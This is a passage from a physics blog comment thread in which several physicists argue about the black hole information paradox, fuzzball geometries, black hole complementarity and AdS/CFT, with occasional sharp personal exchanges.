not the conventional use of the term, therefore not necessarily what some of the people commenting (e.g. Peter) have in mind. Bee, Moshe, I will keep mind that we might each attach personal meanings to the phrase "information loss". One thing I find surprising is the discussion in Bee's paper in the "lifetime of decaying remants" section. Some doubt is cast on the claim that Planckian black holes must have an extremely long lifetime in order to get all the info out, assuming it has not already come out. But if a Planck mass object decays in roughly a Planck time, then it seems clear to me that it decays into a Planckian width pulse of order 1 quanta, and hence carries negligible information. Where could the needed large number come from? Assuming that information is returned to the external observer, there needs to be some large number appearing in an unexpected way. Either you need nonlocal effects on scales much larger than the Planck length, or you need to believe in the existence of PLanck mass objects with lifetimes arbitrarily larger than the PLanck time. I think this is a misunderstanding. We certainly didn't say anywhere that the remnant decays in Planck-time or something of that sort. That section was merely supposed to summarize the discussion and to say that if you look into the calculations that were actually done to address the question how long that last phase would take, there isn't much, and that what we could find doesn't seem to apply to the case without horizon and large internal volume. I have no strong opinion about that either way, I just don't find the status of arguments very conclusive. Best, I am very puzzled by something. The string theorists here seem to think that the whole problem is virtually solved; one even sees sentences like, " This is also well understood." If that is the case, what remains to be done? One school of thought seems to be that essentially *nothing* remains to be done; all that remains is to translate the solution into the gravitational language on that side of the duality. And some people even seem to think that this is mere icing on the cake; maybe a gravitational description isn't really *necessary*. I think that's extremely short sighted. What is *really* needed is a way to get us out of AdS and into the real world; unless somebody can perform a miracle and bring Strominger's "dS/CFT" back to life.... Dear Peter, don't believe what you say. For example, there doesn't seem to exist any material difference between my and Moshe's attitudes. Moshe is an Israeli Canadian while I have never been to these countries, we never shared any real teachers, and so on. Still, we end up with the same conclusions. The qualitative answers to the big questions about the paradox are known by today, and if we're dreaming about something, it's a more "local" intuition or description of what's going on, especially inside the hole. But we're not guaranteed that such an additional thing exists so it is not clear whether the search for it makes sense. Dear Dr Who: I don't believe that dS/CFT was a step to the real world or a new necessary ingredient to understand dynamics of black holes in the real world. The de Sitter space is much tougher - its empty version carries a huge entropy itself - and the predictable quantities in it are always "vague", affected at least the thermal radiation from the cosmic horizon. dS/CFT has never worked and I am tempted to think that after years of sensitivity about it, Andy would agree today. If you neglect cosmological differences - the tiny acceleration of expansion - and study the local physics, the mystery of black holes in AdS, flat, or dS space is clearly equivalent. Sabine: one more thing about the "fictitious nonlocality". If you consider e.g. Matrix theory (BFSS model), a matrix quantum mechanics with a U(N) group equivalent to M-theory for large N, the graviton - the simplest and lightest state in the theory - is an extremely complicated wave function of X-coordinates and theta-coordinates filled into N x N Hermitean matrices. If you look at the typical "size" of this bound state of D-branes, it scales like N^{1/3} (and around special directions, N^{1/9}). The relevant physics is for infinite N, so this bound state looks extremely extended, nonlocal (imagine N being 10^{900}). But various dualities guarantee that if you have these "macroscopic clouds" going through each other, their interactions are almost exactly zero. It's a priori surprising, but with the knowledge of dualities, it is known to be true, and is a part of our "improved intuition". In a similar way, the string itself is an extended object - the typical average x(sigma)^2 over the string is infinite if you send the UV cutoff to infinity. Still, these objects act as locally as you expect from a point-like graviton. The black holes are analogous in this sense, so this "nonlocality" of the fuzzball is largely undetectable. The issue here is that the parts of the graviton/hole that are very far are associated with extremely huge frequencies (very fast degrees of freedom), so they average out very quickly to zero in all measurements (similar argument like one for the classical limit of a Feynman path integral where the typical trajectory that contributes is extremely unsmooth, too). So only at the central regions of the graviton or hole, they "really" influence things. In the case of the string (or matrix) graviton, it acts like point-like particle, in the case of the black hole, it acts like an empty black hole after one averages over a few microstates (which makes phases in whatever average out to zero). So in some sense, imagining that the black hole remains "horizonful" is a similar "classical" mistake as imagining that Feynman's path integral is dominated by smooth trajectories. It's not and the typical quantum fluctuation is such that the whole space, at least inside, looks very different. Even in flat space, one could say that the typical configuration of QG in the quantum state is complicated. But it is "ordered", in some way. On the other hand, with the presence of event horizons, the horizon region must be able to "scramble" the degrees of freedom quickly, so that the black hole (inside the horizon) cannot be imagined as a quantum fluctuation around a particular smooth classical state. The very fact that the black hole quickly scrambles/thermalizes information is equivalent to the degrees of freedom being permuted in brutal ways. Still, it doesn't contradict the smooth character of the "mixed state" of these microstates. Thanks for the explanation, that is interesting. I have one more question though. I think we are still talking slightly past each other as I said we have only considered real black holes that dynamically form, whereas you have been describing the static case. Could you elaborate somewhat one how you envision that collapse process to happen in the scenario you describe? Especially I would be interested in what happens to the distribution of energy density. Best, Lubos: it can't be as simple as that -- you can't recover the information solely by the assumption that black hole microstates are really extended fuzzy objects. I assume that an infalling observer will experience falling through the horizon in the same way as predicted by the standard black hole geometry (if this is not true then you can throw out standard results like thermal Hawking radiation). If so, then you have the usual quantum xerox problem: the information about the observer is inside the horizon, but the outside observer says that this information is coming out with the Hawking radiation. At this stage, a string theorist might invoke the "black hole complementarity principle" to argue that the information hasn't really been duplicated. The trouble is that there is no independent evidence for this principle beyond its use in solving the above paradox, so the argument becomes circular. The point is that even after making your reasonable sounding assumptions, you still need to make a much more radical assumption later on for the story to work. If a generic microstate has quasi nonlocal behaviour (I realize it averages out classically) and indeed from its point of view no horizon is formed, then couldn't you simply run the argument utilized against lorentz violating theories by say analyzing its behaviour in a highly boosted frame? In fact, are boosts even a symmetry of the system at that stage? Dear Bee, it may be that I won't answer what is really interesting for you, but for me, the actual collapse of a star/dust that creates a black hole is a boring messy classical process. Classical general relativity with the correct low-energy effective theory inserted is an OK description to describe all macroscopic facts about this collapse. And the microscopic details are so chaotic that it makes no sense to study them - one can't formulate any exact questions that I could see. Precise questions become possible when energy etc. can be measured accurately, and to do that, one needs a lot of time - by the uncertainty principle. The black hole birth is qualitatively similar to the birth of any other thing that eventually stabilizes. I don't know what's the best example - for example the igniting of the nuclear reaction in a nuclear power plant. Well, it has some profile, space distribution etc. that engineers should better know a bit. But it follows some low-energy equations and I don't see any contradiction or puzzle here. Before the object is born (or reactor works), the deviation from the ultimate stationary state is large, but it collapses exponentially (by quasinormal ringing modes etc.) as the stationary state is being approached. So sorry if you view the collapse as a part of mysterious quantum gravity - I see no quantum gravity in it whatsoever. Dear Peter, if you ignore the relevant evidence and only use circular arguments, statements can sound circular. It still doesn't prove that they're untrue. In fact, it doesn't mean that there is no better evidence that actually proves that the complementarity is right. And be sure that this evidence exists. In all the holographic descriptions we have, the "boundary" or otherwise non-gravitational description is manifestly mapped to the degrees of freedom outside the black hole only, so complementarity is manifest. So is the extended, difficult, "nonlocal" nature of the microstates, so the only thing that is left is to show that by coarse-graning, one can actually derive the classical physics in the interior, too, and I claim that this is now established at least in some specific examples, too. Papers were cited above. This simultaneous validity of all these qualitative insights above - nonlocal physics that nevertheless looks local whenever it should - may have sounded improbable according to the intuition of the 1970s. But the experience teaches us otherwise and we must learn - and replace our common sense by an "uncommon sense" that actually incorporates what has been calculated. an individual black hole microstate surely breaks the Lorentz symmetry spontaneously - much like any complicated state breaks all symmetries in the region it occupies. On the other hand, this symmetry is restored if one considers expectation values averaged over all the microstates. So the "ensemble" of all these microstates preserves the Lorentz symmetry in regions near the horizon, at least with accuracy that becomes perfect for large black holes. Such a restoration of the symmetry is a nontrivial assertion that is an interesting thing to check in any description of black holes we have - and it hasn't been checked in all of them, as far as I understand, even though from a path-integral perspective, it has to work. But it is only possible because the fundamental laws of the theory still respect local Lorentz symmetry. It is pretty likely that if the symmetry is broken at the fundamental level, one will observe its violation even after any averaging over any microstates, especially if the physics near the horizon - which is extremely sensitive to the behavior of the theory - is considered. In all the holographic descriptions we have, the "boundary" or otherwise non-gravitational description is manifestly mapped to the degrees of freedom outside the black hole only, so complementarity is manifest. This of course contradicts your previous story. If CFT microstates are mapped to extended fuzzballs in the bulk, then for these states the CFT has access to the whole space. The event horizon might emerge after coarse graining, but this won't change the fact that the CFT is describing the entire space. Your version of complementarity is nothing more than the statement that physics outside the horizon is described by variables outside the horizon. The basic problem is the following. In the fuzzball story, the information about an infalling observer comes out in the Hawking radiation in the same way that it would if the observer were falling into a ball of fire. In both cases, for the information to be imprinted in the radiation it is necessary that the observer be burned up in the process. So if you believe in the fuzzball scenario and in the usual rules of quantum mechanics, then you predict that the infalling observer will not fall smoothly through the would-be horizon, but will get destroyed. That's unavoidable. Maybe it's true, but it clearly signals a dramatic breakdown of semi-classical physics. You can't just wave your hands and invoke complementarity here. These fuzzball geometries are horizon free and obey the usual rules of quantum mechanics as far as anyone knows, without some mysterious new complementary rules appearing.If AdS/CFT is a complete description then these new rules have to be derived from this starting point. so the only thing that is left is to show that by coarse-graning, one can actually derive the classical physics in the interior, too, and I claim that this is now established at least in some specific examples, too. Papers were cited above. Anyone following this line of research will know that nothing like this has been done in the context of a large semi-classical black hole. Conversation has strayed quite a bit from the original one, which is probably a good thing. Let me just comment that there are some issues we know almost for certain to be correct - for example the observations of an outside observer in asymptotically AdS space are described by a unitary QM (we can write it down explicitly). I think you'd find very few people that are familiar with the evidence and think otherwise (call them mavericks if you will), including people who at some point strongly held an opposite viewpoint. This is valuable because now we can make progress and ask different series of questions, like the ones Peter is asking here. For example what is the viewpoint of an infalling observer, and how does their semi-classical viewpoint emerge. Fuzzballs (horizon free geometries) are one proposal top deal with such issues, it is not without problems. I think it is fair to say the view of the community is split on these questions. That just means they are more interesting questions to discuss than yet another iteration of the same old arguments about the information paradox. Lubos: to your question. First, we did share some teachers, I certainly think about Tom as one...but to the point, I like the viewpoint of generic non-locality, and approximate locality depending strongly on a specific limit and the set of questions asked. Let me just say that the non-local quantities people discussed at various points in the past, like the size of the graviton in matrix theory, or the size of the string in perturbation theory, always strike me as formal non-measurable quantities. But again, I agree that the implied picture smells right. It seems that once again we disagree on what is boring and what is interesting, which is a discussion that in itself I find boring. Let me therefore just add that as long as you can't describe the dynamical scenario - the collapse of an object into a black hole and its evaporation (or at least, as Peter suggests, something falling into a black hole and its information being reemitted) - you haven't even formulated the problem, not to mention solved it. I assume that an infalling observer will experience falling through the horizon in the same way as predicted by the standard black hole geometry ... If so, then you have the usual quantum xerox problem: the information about the observer is inside the horizon... The scenario Lubos is talking about doesn't have a horizon. It is actually the causal diagram in Fig 3 in our paper (even though he insists the only viable option is (1)). The difference is that he is envisioning information can come out before the Planckian phase because there are non-local effects on horizon scales. That is not the case we have considered in option 3 (in the "conservative" case information doesn't come out before the Planck phase), but that doesn't change the diagram. I don't want to put words into his mouth, but I think the underlying idea is somehow that the information falls into the fuzz, wanders around in there for some while but eventually finds its way out, which is possible because of the messed up causal structure. Best, Just to reiterate, the following statements seem mutually incompatible: 1) A black hole is really a horizon free fuzzball geometry governed by the usual rules of quantum mechanics 2) An observer falling into a fuzzball experiences this roughly as they would falling into a standard black hole geometry 3) Information about the infalling observer is emitted to the outside by Hawking radiation well before the fuzzball/black hole gets to Planckian size. Something has to give. As Bee remarks, it's not clear that there's even a proposal as to how the fuzzball scenario is supposed to work in detail. I think that the main point of Bee's paper is correct: the only scenario that doesn't change the usual rules outside of the Planckian domain is one in which the information gets emitted in the last stages of Hawking radiation by a Planckian black hole whose singularity has been resolved. But of course this scenario requires these Planckian black holes to have an extremely long lifetime, and there is no evidence of this occurring. Peter, the scenario in which the information is encoded in the Hawking radiation also does not require any modification of known physics. For a generic high energy state in any theory the deviations from thermality are very small, so you'd need some very fine measurements to distinguish the state of the Hawking radiation from a thermal one. Semi-classical gravity does not provide you with such fine probes, which is why the question of whether the Hawking radiation is exactly thermal or not is a question for quantum gravity. Phrased differently: even in any ordinary QM system, say anharmonic oscillator, the question of whether perturbation theory is valid is quantity-dependent. So the fact that all curvature invariants are small outside the black hole only means that we can use semi-classical gravity for dealing with SOME calculations. WE get approximately the right answer as long as the quantities we calculate are not too complex, or we don't require too much accuracy. Dear Moshe: Let's suppose the observer falls into the fuzzball and then the external observer carries out the needed fine measurements on the emitted Hawking radiation that encode all the information about the infalling observer. If, as you say, there is no modification of known physics, then since information can't be in two places at once, we conclude that the infalling observer has been burnt up (or bleached, as they say). But this contradicts the description that follows from using the standard black hole geometry. So one way or another, there has to be a violation of the usual physics. Peter, as I emphasized above, all we know in high degree of certainty is that the Hawking radiation outside of the black hole encodes the information, and that this is not that surprising, and does not require any modifications of physics in places we thought it was valid. I agree that a more explicit solution, phrased in a more intuitive and local bulk language, is desirable. The question of the infalling observer is a different one, personally I'm not committed to the fuzzball proposal, partially because of all the good issues you raise. I also have to add that personally I am not that troubled by all the quantum xerox type paradoxes. The reason is that the statement that an observer (presumably modeled by some localized excitation) falls through the horizon is an approximate semi-classical one. In the exact quantum mechanics everything fluctuates and you cannot make this statement precisely. So, I am not sure one can build any sharp conflicts with QM using such an inherently semi-classical concept as the infalling observer. I may be wrong, but it seems to me you can explain away subtle differences by having small probability that the observer isn't precisely what you thought it was. Note that this is very different for the external observer, sitting far away where the metric does not fluctutate much. That observer has every right to believe their observations are described by ordinary unitary time evolution. Moshe, by "known physics" I was including the statement that an infalling observer just sees the usual smooth geometry, but if you remove this assumption then I agree there is no problem. I have to say I'm surprised that this xeroxing doesn't bother you more. Either the infalling observer gets burned, or the fuzzballs have to be acting in a very different way than any other known complex excited system. For all known systems the burning is what makes it possible for the radiation to carry out the information. Peter: I agree that an infalling observer should see a smooth geometry, which is why I am not comfortable with the fuzzball proposal. In my mind one can still can derive such an effective description (for an appropriate set of measurement described by low energy gravity), while having a complete description that is very different. In such situations, not that uncommon in physics, you replace questions such as "what really happened" with more precise ones involving measurable quantities. The mental picture you employ depends on the set of questions you ask. Anyhow, none of this is not in any conflict with the observation that the Hawking radiation outside the black hole encodes all the information, which is the only point I'm trying to make. the scenario in which the information is encoded in the Hawking radiation also does not require any modification of known physics. For a generic high energy state in any theory the deviations from thermality are very small, so you'd need some very fine measurements to distinguish the state of the Hawking radiation from a thermal one. Semi-classical gravity does not provide you with such fine probes, which is why the question of whether the Hawking radiation is exactly thermal or not is a question for quantum gravity. While the question whether Hawking radiation *is* thermal or not might not be a question for quantum gravity, the question how you *get* information from the initial state into the not-quite thermal radiation is. See, I have no problem with the radiation not being thermal per se. I agree that this could necessitate very fine propes. What I don't see is how you dynamically transfer the information from the collapsing object (or infalling observer) into the radiation without any substantial deviations from the semi-classical approximation well outside the region where you would expect it. In the exact quantum mechanics everything fluctuates and you cannot make this statement precisely. Except that there is no reason why there should be substantial fluctuations at the horizon. Best, Bee, the question of "how" the information becomes accessible is different from "whether" it does. Since we now know with near-certainty that it does (in my opinion), it is time to discuss different scenarios and proposals for the "how" question, without getting distracted with the "whether" question any more. Just my opinion. As for the "how" question, let me try to phrase my personal faith. Comments are welcome, I'm not really a religious type. So, let me describe the formation of evaporation of BH from the two perspectives of the infalling and outside observer. For an outside observer, the matter forming the black hole becomes hotter and hotter as it reaches the horizon. It starts probing short distance physics. For coarse grained probes this is described effectively by having a stretched horizon: hot membrane just slightly outside where the horizon would be. If you have a complete theory of the outside observer, just as we do in AdS/CFT, we know how to calculate the deviations from that picture, but to be sensitive to those we need to go beyond semi-classical gravity. This is more or less well-established in the asymptotically AdS context. The infalling observer viewpoint is less established. Maybe the following is not too far fetched: Let us describe the last stages of the "burning" process from the would-be-infalling observer viewpoint. The basic point is that the set of natural (low energy, gravitational) probes available to that infalling observer is different. They probe naturally a different coarse-graining of the same system. Presumably, their coarse-grained probes can be described approximately by an effective metric which is the one inside the horizon. That picture becomes less and less accurate as you get closer to the singularity of that effective metric. I think the key to this mental exercise is stop looking at the metric as the whole truth, and accept that it is an effective description valid only for specific type of observations. It is then not inconceivable that two observers, making very different coarse grained measurements, describe their partial truth using different mental pictures. Moshe, I don't mind if there are two different mental pictures, but I do mind that the information about the infalling observer is in two places at once (with that observer inside the fuzzball and in the radiation). This means that the fuzzball is not obeying the usual rules of quantum mechanics. Peter, I did not mention fuzzballs, because I doubt the burning process as viewed by an outside observer can be described using an effective geometry only. But, to your question: in the scenario I described there only one information, and it propagates by a unitary evolution in the full theory. However, there is no invariant meaning to "where" it is. Since the infalling and outside observer are capable of asking very different set of questions, they will answer that "where" question very differently. Which only means that is not a good question to ask in the full story. Ok, so you have a complicated microstate that spontaneously breaks Lorentz symmetry. But then this means there are goldstone modes and higher energy states that do respect this symmetry (eg individual strings I guess). So we go from a fundamental lorentz invariant theory to a complicated emergent mess that breaks locality somehow (incidentally are there any associated fuzzball operators that are gauge invariant?), but then that averages away (kind of like how lorentz symmetry is restored on the lattice in the continuum) in some classical statistical limit. So i'm still unclear how locality is violated in all this, given the fundamental description in terms of strings, and surely that has to give way slightly if we are to believe bh complementarity and holography. Also, why are we counting fuzzball degrees of freedom rather than the more fundamental stringy ones? Looking for a science process that reveals some of the quandary about what is presented helps toward that end may be interesting thinking in relation QGP processes? Penrose (2004, p.803): “Under normal circumstances, moreover, one must regard the density matrix as some kind of approximation to the whole quantum truth. For there is no general principle providing an absolute bar to extracting detailed information from the environment. Maybe a future technology could provide means whereby quantum phase relations can be monitored in detail, under circumstances where present-day technology would simply ‘give up’. It would seem that the resort to a density-matrix description is a technology-dependent prescription! With better technology, the state-vector could be maintained for longer, and the resort to a density matrix put off until things get really hopelessly messy! It would seem to be a strange view of physical reality to regard it to be ‘really’ described by a density matrix (…)” Having recognition of muon detection processes in Gran Sassois it evidenced enough then that such a process(microscopic blackholes) help to orientate our thinking in that experimental sense. Not to ignore IceCube either. It's a matter of having a larger perspective(bulk descriptions are fine to me:)while discussing the formalities. Lubos was working toward that end. While Moshe is being realistic yet still far from pinpointing. A preference perhaps. Dear Moshe, I didn't know Tom was literally or effectively teaching you! OK, that changes much about my comment, of course. But still, you're not Czech, are you? ;-) Peter: if you expand the gauge theory perturbatively etc., you see black holes with horizons, and you don't see inside. If you don't do such an expansion and study the microstates on the boundary, you do see the microstates and there's no horizon. There's really no contradiction here. The low-energy description with GR - or SUGRA - only emerges in the planar limit in 1/N expansions, for large N, and if you do it, the GR with horizons and complementarity emerges. If you don't do it, there is nothing special about the interior because you don't see it. You don't see any smooth bulk geometry, after all, but the unitarity is as obvious as in any nongravitational system. Moshe: I completely agree that the large sizes of the BFSS bound states etc. are unmeasurable. That was really my point. But don't you think that in a similar way, the large size of a BH microstate (or fuzzball, but let me avoid the word below) is analogous, at least with worse than Planckian probes? Bee: that's interesting that you find the "interesting vs. boring discussion" boring because you're the only one who is trying to open this discussion all the time. I am not interested in it. I am interested in the "correct vs incorrect" issues. I may be wrong, but it seems to me you can explain away subtle differences by having small probability that the observer isn't precisely what you thought it was. Moshe, If, with probability near 1, the information comes out, then if you believe conventional quantum information theory and the semi-classical view of a black hole, with probability near 1 the in-falling observer must be destroyed near the horizon. It's possible that the observer can be saved (until he approaches the singularity) at the same time as unitarity can be saved, by some black hole complementary principle, but nobody has figured out how this works, and you can't say its conventional physics. Peter Shor: the scenario I gave in my previous comment is consistent with QM unitarity and with each observer's viewpoint of the part of spacetime accessible to them by using only low energy probes (note that this expression has different meaning for both observers). Of course there are a lot of details to fill out, especially on how the viewpoint of the two observers are related. So, it is definitely far from being established. But, this seems to me the minimal scenario that is not inconsistent with the known facts about low energy gravitational physics and quantum information theory, all well-established parts of physics. Maybe I'm wrong. The only thing you sacrifice is the ability to ask questions that are not necessarily well-defined in the full theory, like "where" things happen. If the geometry (or more precisely geometries) are just effective descriptions of the situation for certain probes, in a certain limit, the question of "where?" would always be answered with another question: "using which probes?". Well, Moshe, that's all very impressive in a way, though I fear that you severely underestimate the difficulties of making precise the notion of "geometry" as an "effective description" [of what?] Still, if I may drag you back to the main point of Sabine's original post: why do you prefer this to the solution proposed by Horowitz and Maldacena, which allows us to dispense with weird things happening near the horizon? I find the H+M paper almost as amazing and stimulating as Maldacena's "eternal black holes" paper. It certainly deserves far more attention than fuzzballs. As far as I understand the Horowitz-Maldacena paper (and I'm trying to translate it into everyday terms), it says that we have a definite quantum state at "the end of time," that is, at the singularity inside a black hole, as well as "the beginning of time," that is, the Big Bang. Wouldn't this mean that somehow, time runs backwards near the singularity. Can this really be made to work consistently? Should this be detectable in the neighborhood of black holes? Pope, I don't understand the M-H paper very well, maybe I'll invest some time trying to do that. It may well be the way things work for an in-falling observer. I am also not sure it necessarily contradict the complementarity picture. As for the effective description, this may be not as difficult or alien as you think. Lots of progress is being made in realizing the ways geometry can emerge from ordinary QM systems in certain limits. AdS/CFT is probably the best understood example, the gauge theory is the fundamental description, it doesn't look like a gravitational theory on AdS, not at all. Nevertheless, there is an AdS hiding in there, with gravitons and strings and black holes and all those other good things. They are all only approximate concepts, valid in a certain limit, provided you don't ask questions that are too probing of the underlying structure. Peter Shor: If, with probability near 1, the information comes out, then if you believe conventional quantum information theory and the semi-classical view of a black hole, with probability near 1 the in-falling observer must be destroyed near the horizon. I am sorry, Mr Shor, but if all the information gets out and if the semiclassical picture holds at the same moment, then one can derive that you are a pink elephant. Or anything else. Simply because these two things are incompatible with each other. If there is an exact horizon, the information gets lost exponentially and it can never come out again, because of simple constraints of causality, regardless of your fairy-tales about the events near/at the singularity. That Hawking has proven by this simplified proof is pretty much equivalent. The singularity is irrelevant: the causal limitations come from the horizon. I wonder how many centuries it will take before well-known academicians around physics start to take notice. As I continue to read Prof. John Moffat’s book while looking at all frenzied comment activity that your most recent paper has raised, I can’t help but wonder, what if Moffat’s right? I realize that modified gravity theories don’t get much attention by way of respect, as the dark matter/dark energy scenarios are what's most broadly accepted. Yet what if in the off chance he is right, then all of this discussion either way would have little significance. With his theory, there is no dark matter and the rapid expansion is explained with a repulsive aspect to gravity, by way of the consequence and being in combination with a fifth force (additional level of freedom). What however is most important relating to this discussion is there are no singularities or event horizons and thus no way to violate the 2nd law or better have reason to be concerned that it is. With all the problems that dark matter dark energy brings, along with the additional concerns entropy (information) loss raised here, I’m further left to wonder why this idea hasn’t received greater attention. Strangely enough it also seems somewhat consistent with Smolin’s idea, that the only thing being non emergent is time, for both matter and energy emerge with t=0 in Moffat’s proposal lending no significance other then to mark when both a negative and positive time universes began. However this would not be what we recognize as the begiinning of time in general, yet strictly time as it relates to these universes. In other words the time that proceeded and continues is what Smolin might call waiting time, as in fundamental time. So if conservative is to be looked at as the criteria, as to be considered being what’s relevant, perhaps then it should be also asked if it this idea is not the most qualified? The singularity is irrelevant: the causal limitations come from the horizon. I wonder how many centuries it will take before well-known academicians around physics start to take notice. You are correct that the causal limitations come from the horizon, nobody every debated that. But that isn't the problem. You have yourself discussed a scenario without future horizon (see definition in paper) and without a singularity. Now the only thing you need to realize is that if the solution was quantum singular (see definition in the paper), the information would not only be caught inside either an apparent horizon (option 3) or indeed an event horizon (option 4), but it would actually be destroyed and lost in the singularity. The reason this doesn't happen in the fuzzball is that it it's quantum non-singular. If you think about it for a while you will realize that the scenario you are advocating is quite similar to our option 3, except that you are convinced information can come out before the Planckian endphase. Lubos: Let me try again. Yes, it is true that semi-classical gravity can be thought of as a 1/N expansion. This means that if you compute something in this expansion, finding that higher order terms are more and more suppressed, you should conclude that any errors to semi-classical gravity are of order something like exp(-1/N). Now apply this to the infalling observere for very large N. In this expansion you will find that with roughly probability 1 the observer falls smoothly through the horizon, keeping his information intact. You therefore conclude with near certainty that this information can't be simultaneously measured in the Hawking radiation, if you believe in standard quantum mechanics. What you are demanding is that this semi-classical expansion break down at leading order even though direct computation shows it to be well-behaved. This is a logical possibility, but it's a dramatic breakdown of an expansion in a regime where general principles say it should be valid, and I don't know any analog of such a thing elsewhere in physics, so more "details" are needed, to put it mildly. regarding your above comment with the infalling and outside observer, you write "we know how to calculate the deviations from that picture, but to be sensitive to those we need to go beyond semi-classical gravity." Could you be more explicit on what you mean with "go beyond semi-clasical gravity"? Best, Peter Shor: I already answered that question. When you are careful to use only well-defined questions, you can see that the two perspectives on what happens to the infalling observer can be simultaneously correct, just as two descriptions of the same process, without any dramatic failure of perturbation theory in regimes where it is supposed to be valid. I also think this is the only way you can keep what we know to be correct in GR, in the appropriate regime of validity, and keep QM unitarity intact. I think the main barrier to come to terms with this picture is attributing the spacetime metric more reality than it deserved, therefore assuming that questions like "where" various things happen have absolute observer-independent answers. The main point is that the geometrical perspective summarizes the observations using low energy probes (which don't have too much resolution). Since those probes are different for the two observers, related by (classically) infinite boost, they will describe the process using effective metrics which are different from each other. I may be wrong in all that, but I appreciate if you tell me how. Where precisely in the picture I drew above do I get a failure of PT in regimes it is supposed to be valid? Dear Bee, I don't see how anything I advocate can possibly be summarized by option 3). 3) is described by a particular causal diagram, a causal diagram only makes sense when there is a nearly smooth geometry, and in any description where there is a smooth geometry in the framework I advocate, the spacetime looks so that the causal diagram is drawn as 1). Whether one says that the information is killed, undergoes euthanasia, or reincarnates into another Universe near (or at) the singularity is a matter of untestable philosophy (or religion). What is important for physics is whether the information can get out where we decide whether the information was lost: to scri plus. And it is the causal rules plus the existence of the horizon that imply, in the semiclassical picture, that the information can't get there. The philosophy around the singularity has nothing to do with these physical questions. It's interesting that you're among the people who like to say that proper high-energy physics - string theory - has become a philosophy, but when it comes to a particular example, you advocate religious questions instead of a proper rational analysis of measurable issues. Dear Peter, the non-perturbative contributions to 1/N perturbative expansions don't go like exp(-1/N) but rather exp(-CN) or exp(-CN^2). Think twice. Otherwise, sure, the "probability that one can extract the information" is not behaving continuously in the limit. It is "0" in the 1/N expansion but "1" in the accurate treatment. There is nothing inconsistent about it. It's an order-of-limits issue. The resolution needed to get the information out becomes extremely fine as N goes to infinity and the black hole is kept large. If you ask whether you can get the information out with a fixed resolution, in Planck units, the probability would be a continuous function of N. You can't "practically" get it out from large black holes, neither for finite N nor for infinite N. The discontinuities of the type you are bothered by are completely common in physics. For example, the microscopic description of N atoms is time-reversal symmetric for any N, but the thermodynamic, large N limit - a phenomenological theory of matter - is time-irreversible and contains terms like the friction (that is calculable from the microscopic laws, at least in principle). It is completely analogous to the black hole case. The analogy is "large N" = "large N"; "preserved information" = "time-reversal symmetry". Let me elaborate upon the analogy a little bit because this debate looks nearly isomorphic to some debates with Sean Carroll who was saying similar bizarre things in the case of thermodynamics. For finite N, the number of atoms, we have a time-reversal symmetric theory. It preserves the information, too. It is reversible. I think that in this case, it's the side that Sean Carroll is getting and it is analogous to the description in terms of black hole microstates or fuzzballs. However, there exists an extremely important large N limit of the theory describing N iron atoms. It is the macroscopic theory of pieces of iron described by partial differential equations for an iron continuum. This theory knows about the density of iron, various types of torsion, stresses, and friction. Many of the terms in these equations violate the time reversibility, having first time-derivatives in them. Also, the things is slowing down by friction. These are completely analogous processes to those in GR where black hole emits waves and, following the ringing mode patterns, approaches the static (e.g. perfectly spherical) shape. Now, for finite N, the information is preserved and the evolution is reversible. But the strict infinit N limit is a "new emergent theory" that knows nothing about the individual atoms or pieces of fuzzballs. And this theory is not time-reversible, and kills information (classically, it shrinks the volume of phase space during the frictionful evolution, even in the iron case). Now, Sean Carroll doesn't understand how physics can possibly predict that the entropy increases and doesn't decrease instead, even though the laws should be T-symmetric. That's his problem because it's important that the entropy does increase and not decrease and every theory that would say otherwise is ruled out by basic observations. Of course, we also know theoretically why the entropy increases. Any coarse-graining increases the volume of the envelope of some states in the phase space. The initial states are "well-defined" regions of the phase space, because we always study well-defined initial conditions, while the future state is always determined from the initial one by the evolution laws, so it is "chaotic" and has higher entropy. It's interesting to notice how this influencs the jump from the micro to the macro description. Carroll doesn't see how the friction could ever be derived from a microscopic theory. But it can be derived in a very transparent way, following variations of Boltzmann's H-theorem. How does one see that the final state is "chaotic"? Well, one may assume "molecular chaos" - random velocities in the initial state. This is completely analogous to the averaging over the black hole microstates. When one does so, he ends up with time irreversible effective equations - either GR with horizons and information loss; or with a theory of matter continuum with friction and viscosity and dissipation. Molecular chaos may be controversial because there's no "preferred" random distribution at the beginning. But the details of the initial distribution really don't matter for the growth of the iron entropy, horizon area, horizon itself, or irreversibility: the only condition is that we must avoid infinitely unlikely and contrived choices of the initial state that would evolve into a low-entropy final state. It's not that hard to miss the special "adjusted" initial states. So once we average over some initial microstates (of fuzzballs; or the velocities of iron atoms), we inevitably end up with the effective description, in the large N limit, that is irreversible, dissipates, generates entropy, and so on. Dear Peter, the non-perturbative contributions to 1/N perturbative expansions don't go like exp(-1/N) but rather exp(-CN) or exp(-CN^2). Think twice. Touche. But the rest of your response is just wrong. Think about it. It's just like the decay of an unstable state in QM via tunneling. THis vanishes to all orders in hbar, but tunneling gives a contribution exp(-c/hbar). This is a very small effect, and so the perturbative result that the state is approximately stable is almost correct. In perturbation theory the proton is stable, and so that must be approximately true, and indeed decays due to nonperturbative effects give it a very long lifetime. IN your example, at large N the system will exhibit time irreversibilty to an excellent approximation (this is how our world looks after all). I'm stating the obvious: perturbation theory is very accurate when the expansion parameter is small, and corrections to perturbation theory are then exponentially small. So if perturbative semi-classical gravity says with probability one that on observer falls through the horizon in a smooth way, then this must be very close to the truth. The potential loopholes, which is what Moshe is getting at, are quite different than what you are claiming. I don't see how anything I advocate can possibly be summarized by option 3). Let me explain: Option 3) depicts an asymptotically semi-classical spacetime without a future event horizon and without a quantum singularity, for definitions see paper. Correct me if I am wrong, but I think this has been the case you have been talking about. As far as I know, fuzzballs neither have an event horizon, nor a singularity. The diagram you insist is the correct one however clearly does have both an event horizon and a singularity. Maybe you should make up your mind. 3) is described by a particular causal diagram, a causal diagram only makes sense when there is a nearly smooth geometry, and in any description where there is a smooth geometry in the framework I advocate, the spacetime looks so that the causal diagram is drawn as 1). The geometric is smooth in the asymptotic limit. It might not be smooth in a region where quantum effects are non-negligible, there one shouldn't trust the diagram. That is the region shaded in grey. It might not even make sense to speak of locality in this region. That however doesn't change the fact that this region is embedded in the asymptotically classical space-time. It does not have a clear boundary (as effects don't suddenly turn on, but become gradually more important), but it certainly can be contained within a well defined classical region. It's interesting that you're among the people who like to say that proper high-energy physics - string theory - has become a philosophy, It is quite pathetic how you continue to invent things I never said. In case that is what you are referring to, I have on an earlier occasion asked the readers of this blog whether Physics will turn into Philosophy. Not only are you replacing Physics with String Theory, you also seem to have problems figuring out what the difference is between a question and a statement. (Now that I think about it, this is also evident in this comment section. Did it ever occur to you I ask questions not because I'm just stupid, but because I want 